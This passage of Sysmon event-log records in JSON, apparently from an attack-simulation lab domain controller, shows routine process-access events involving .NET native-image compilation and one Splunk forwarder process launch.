C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001021840D00}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.913\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001036870D00}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.913","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001036870D00}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.913\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001036870D00}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.913","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001036870D00}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.929\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001036870D00}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.929","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001036870D00}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.960\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010A98A0D00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.960","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010A98A0D00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.960\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010A98A0D00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.960","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010A98A0D00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.960\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010A98A0D00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.960","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010A98A0D00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.400\r\nProcessGuid: {41C8662E-2255-5F25-0000-0010938D0D00}\r\nProcessId: 5040\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.400","ProcessGuid":"{41C8662E-2255-5F25-0000-0010938D0D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00107B2D0D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 